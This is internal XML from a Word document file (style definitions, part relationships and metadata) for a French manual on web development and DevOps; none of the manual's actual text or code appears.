      <w:spacing w:before="0" w:after="200" w:line="702" w:lineRule="exact"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b/>
      <w:i w:val="0"/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="52"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TitreAnnexe">
    <w:name w:val="Titre d'annexe"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="0" w:after="200" w:line="648" w:lineRule="exact"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b/>
      <w:i w:val="0"/>
      <w:color w:val="0F2E4C"/>
      <w:sz w:val="48"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TitreHorsSommaire">
    <w:name w:val="Titre hors sommaire"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="0" w:after="240" w:line="486" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b/>
      <w:i w:val="0"/>
      <w:color w:val="0F2E4C"/>
      <w:sz w:val="36"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TitreRubrique">
    <w:name w:val="Titre de rubrique"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="360" w:after="140" w:line="352" w:lineRule="exact"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b/>
      <w:i w:val="0"/>
      <w:color w:val="274B6D"/>
      <w:sz w:val="26"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SurTitre">
    <w:name w:val="Sur-titre"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b/>
      <w:i w:val="0"/>
      <w:color w:val="E0A21B"/>
      <w:sz w:val="17"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Metadonnees">
    <w:name w:val="Métadonnées"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:spacing w:before="0" w:after="120" w:line="230" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b w:val="0"/>
      <w:i w:val="0"/>
      <w:color w:val="5B6770"/>
      <w:sz w:val="17"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TOCCours">
    <w:name w:val="TOC cours"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:spacing w:before="0" w:after="30" w:line="256" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
      <w:b w:val="0"/>
      <w:i w:val="0"/>
      <w:color w:val="1F2933"/>
      <w:sz w:val="19"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TOCCoursPartie">
    <w:name w:val="TOC cours partie"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:spacing w:before="160" w:after="40" w:line="256" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b/>
      <w:i w:val="0"/>
      <w:color w:val="0F2E4C"/>
      <w:sz w:val="19"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ReponseQuiz">
    <w:name w:val="Réponse quiz"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:spacing w:before="0" w:after="80" w:line="256" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
      <w:b w:val="0"/>
      <w:i w:val="0"/>
      <w:color w:val="1F2933"/>
      <w:sz w:val="19"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Code">
    <w:name w:val="Code"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="244" w:lineRule="exact" w:before="180" w:after="240"/>
      <w:ind w:left="142" w:right="28"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
      <w:color w:val="1F2933"/>
      <w:sz w:val="18"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Exercice">
    <w:name w:val="Exercice"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="280" w:after="80" w:line="284" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b/>
      <w:i w:val="0"/>
      <w:color w:val="0F2E4C"/>
      <w:sz w:val="21"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Question">
    <w:name w:val="Question"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="60" w:line="256" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b/>
      <w:i w:val="0"/>
      <w:color w:val="274B6D"/>
      <w:sz w:val="19"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Corrige">
    <w:name w:val="Corrigé"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="80" w:line="284" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b/>
      <w:i w:val="0"/>
      <w:color w:val="E0A21B"/>
      <w:sz w:val="21"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Option">
    <w:name w:val="Option"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:spacing w:before="0" w:after="40" w:line="284" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
      <w:b w:val="0"/>
      <w:i w:val="0"/>
      <w:color w:val="1F2933"/>
      <w:sz w:val="21"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Legende">
    <w:name w:val="Légende"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:spacing w:before="60" w:after="200" w:line="230" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b w:val="0"/>
      <w:i/>
      <w:color w:val="5B6770"/>
      <w:sz w:val="17"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="LegendeCode">
    <w:name w:val="Légende de code"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:spacing w:before="0" w:after="80" w:line="216" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b/>
      <w:i w:val="0"/>
      <w:color w:val="274B6D"/>
      <w:sz w:val="16"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="NoteFigure">
    <w:name w:val="Note de figure"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:spacing w:before="0" w:after="160" w:line="202" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b w:val="0"/>
      <w:i/>
      <w:color w:val="5B6770"/>
      <w:sz w:val="15"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Source">
    <w:name w:val="Source"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:spacing w:before="40" w:after="160" w:line="216" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b w:val="0"/>
      <w:i/>
      <w:color w:val="5B6770"/>
      <w:sz w:val="16"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="340" w:lineRule="exact" w:before="180" w:after="20"/>
      <w:ind w:left="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b/>
      <w:color w:val="0F2E4C"/>
      <w:sz w:val="23"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="310" w:lineRule="exact" w:before="20" w:after="10"/>
      <w:ind w:left="283"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b w:val="0"/>
      <w:color w:val="1F2933"/>
      <w:sz w:val="21"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="292" w:lineRule="exact" w:before="0" w:after="0"/>
      <w:ind w:left="624"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
      <w:b w:val="0"/>
      <w:color w:val="1F2933"/>
      <w:sz w:val="21"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR"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header" Target="header4.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer4.xml"/><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 Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header5.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer5.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header6.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer6.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header7.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer7.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header8.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer8.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header9.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer9.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header10.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer10.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header11.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer11.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header12.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer12.xml"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header13.xml"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer13.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header14.xml"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer14.xml"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header15.xml"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer15.xml"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header16.xml"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer16.xml"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.png"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.png"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.png"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.png"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header17.xml"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer17.xml"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header18.xml"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="foot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Développement web &amp; DevOps — Manuel complet</dc:title>
  <dc:subject>HTML5, CSS3, JavaScript, Linux, conteneurs, cloud et fiabilité</dc:subject>
  <dc:creator>IcaBot — ESPRITROPIC COMMUNITY</dc:creator>
  <cp:keywords>HTML, CSS, JavaScript, DevOps, Linux, Docker, Kubernetes, Terraform, CI/CD, SRE</cp:keywords>
  <dc:description>Volume unique — Bibliothèque technique Espritropic, édition 2026</dc:description>
  <cp:lastModifiedBy>IcaBot — ESPRITROPIC COMMUNITY</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:modified>
  <cp:category>Manuel technique</cp:category>
  <dc:language>fr-FR</dc:language>
</cp:coreProperties>
</file>